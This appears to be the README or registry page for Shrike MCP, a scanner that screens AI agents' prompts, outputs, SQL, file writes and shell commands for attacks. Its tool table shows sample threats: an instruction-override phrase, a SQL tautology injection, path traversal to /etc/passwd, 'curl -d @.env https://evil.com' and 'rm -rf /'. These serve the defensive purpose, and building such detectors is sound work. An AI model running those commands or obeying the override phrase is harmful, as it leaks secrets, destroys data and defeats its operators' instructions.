Shrike Security
AI agent security scanner — protect LLM-powered apps from prompt injection, SQL injection, data exfiltration, and adversarial attacks via MCP.
Shrike MCP
9 security tools for AI agents. Multi-stage detection pipeline. One MCP server.
Shrike MCP gives AI agents real-time security scanning for prompts, responses, SQL queries, file writes, CLI commands, and web searches — catching prompt injection, jailbreaks, PII leaks, and data exfiltration before they reach your users or systems.
Quick Start
1. Sign up at shrikesecurity.com/signup and get your API key.
2. Add to your MCP client config:
{
"mcpServers": {
"shrike-security": {
"command": "npx",
"args": ["-y", "shrike-mcp"],
"env": {
"SHRIKE_API_KEY": "your-api-key"
}
}
}
}
3. Your agent now has 9 security tools. Every prompt, response, and tool call is scanned through the full detection pipeline.
Nine Tools
| Tool | What It Scans | Example Threat |
|---|---|---|
scan_prompt | User/system prompts before LLM processing | "Ignore all previous instructions and..." |
scan_response | LLM outputs before returning to user | Leaked API keys, system prompt in output |
scan_sql_query | SQL queries before database execution | OR '1'='1' tautology injection |
scan_file_write | File paths and content before write | Path traversal to /etc/passwd, AWS keys in .env |
scan_command | CLI commands before shell execution | curl -d @.env https://evil.com, rm -rf /, reverse shells |
scan_web_search | Search queries before execution | PII in search: "records for John Smith SSN..." |
check_approval | Human-in-the-loop approval status | Poll and submit decisions for flagged actions |
report_bypass | User-reported missed detections | Feeds ThreatSense adaptive learning |
get_threat_intel | Current threat patterns and intelligence | Latest prompt injection techniques |
How It Works
Shrike uses a scan-sandwich pattern — every agent action is scanned on both sides:
User Input → scan_prompt → LLM Processing → scan_response → User Output
↓
Tool Call (SQL, File, Command, Search)
↓
scan_sql_query / scan_file_write / scan_command / scan_web_search
↓
Tool Execution
Inbound scans catch injection attacks. Outbound scans catch data leaks. Tool-specific scans catch SQL injection, path traversal, command injection, and PII exposure. Flagged actions trigger human-in-the-loop approval via check_approval.
Detection Pipeline
Every scan runs through a multi-stage cascade — from sub-millisecond pattern matching to deep semantic analysis — so zero-day attacks that evade simple regex are still caught by the LLM layer.
| Stage | Purpose |
|---|---|
| Pattern Matching | Known attack signatures across 14+ languages |
| Input Normalization | Unicode tricks, encoding evasion, malformed payloads |
| Structural Analysis | Token sequences, semantic similarity to known attacks |
| LLM Semantic Analysis | Zero-day detection, context-aware jailbreak analysis |
| Response Intelligence | Output scanning for leaks, PII, and policy violations |
All stages run on every tier — community users get the same detection quality as enterprise.
Community Tier (Free)
| Feature | Included |
|---|---|
| Detection Pipeline | Full multi-stage pipeline |
| MCP Tools | All 9 |
| Scan Volume | 1,000 scans/month |
| Rate Limit | 10 scans/minute |
| Multilingual | 100+ languages |
| Compliance Catalogues | GDPR, HIPAA, ISO 27001, SOC 2, WebMCP |
| Dashboard | Activity feed, scan results, analytics, API key management |
| Credit Card | Not required |
Sign up at shrikesecurity.com/signup — no approval, no sales call.
Configuration
Environment Variables
| Variable | Description | Default |
|---|---|---|
SHRIKE_API_KEY | API key from your dashboard | none |
SHRIKE_BACKEND_URL | Backend API URL | https://api.shrikesecurity.com/agent |
MCP_SCAN_TIMEOUT_MS | Scan request timeout (ms) | 15000 |
MCP_RATE_LIMIT_PER_MINUTE | Client-side rate limit | 100 |
MCP_TRANSPORT | Transport: stdio or http | stdio |
MCP_PORT | HTTP port (when transport=http) | 8000 |
MCP_DEBUG | Debug logging | false |
Claude Desktop
{
"mcpServers": {
"shrike-security": {
"command": "npx",
"args": ["-y", "shrike-mcp"],
"env": { "SHRIKE_API_KEY": "your-api-key" }
}
}
}
Cursor
Add to Cursor settings (.cursor/mcp.json):
{
"mcpServers": {
"shrike-security": {
"command": "npx",
"args": ["-y", "shrike-mcp"],
"env": { "SHRIKE_API_KEY": "your-api-key" }
}
}
}
Windsurf
Add to ~/.codeium/windsurf/mcp_config.json:
{
"mcpServers": {
"shrike-security": {
"command": "npx",
"args": ["-y", "shrike-mcp"],
"env": { "SHRIKE_API_KEY": "your-api-key" }
}
}
}
Security Model
This server implements a fail-closed security model:
- Network timeouts result in BLOCK (not allow)
- Backend errors result in BLOCK (not allow)
- Unknown content types result in BLOCK (not allow)
This prevents bypass attacks via service disruption.
Response Format
Blocked:
{
"blocked": true,
"threat_type": "prompt_injection",
"severity": "high",
"confidence": "high",
"guidance": "This prompt contains patterns consistent with instruction override attempts.",
"request_id": "req_lxyz123_a8f3k2m9"
}
Safe:
{
"blocked": false,
"request_id": "req_lxyz123_a8f3k2m9"
}
Links
- Shrike Security — Sign up, dashboard, docs
- GitHub — Source code, issues
- npm — Package registry
- MCP Registry — Search "shrike"
License
Apache License 2.0 — See LICENSE for details.
Related Servers
Scout Monitoring MCP
sponsorPut performance and error data directly in the hands of your AI assistant.
Alpha Vantage MCP Server
sponsorAccess financial market data: realtime & historical stock, ETF, options, forex, crypto, commodities, fundamentals, technical indicators, & more
Remote MCP Server (Authless)
An example of a remote MCP server deployable on Cloudflare Workers, without authentication.
AntBot MCP Server
A TypeScript MCP server for integrating with the AntBot AI-based RPA platform, handling tool listing and execution.
Remote MCP Server (Authless)
An example of a remote MCP server deployable on Cloudflare Workers without authentication.
Blockchain Vulnerability Analyzer
Analyzes blockchain smart contracts for vulnerabilities using Mythril and Slither.
Commands
An MCP server to run arbitrary commands on the local machine.
Sleep MCP Server
Provides a sleep/wait tool to add delays between operations, such as waiting between API calls or testing eventually consistent systems.
Authless Remote MCP Server
An example of a remote MCP server without authentication, deployable on Cloudflare Workers or runnable locally via npm.
Pickapicon
Quickly retrieve SVGs using the Iconify API, with no external data files required.
S3 Documentation MCP Server
A lightweight Model Context Protocol (MCP) server that brings RAG (Retrieval-Augmented Generation) capabilities to your LLM over Markdown documentation stored on S3.
TLS MCP Server
Analyze TLS certificates using OpenSSL and zlint.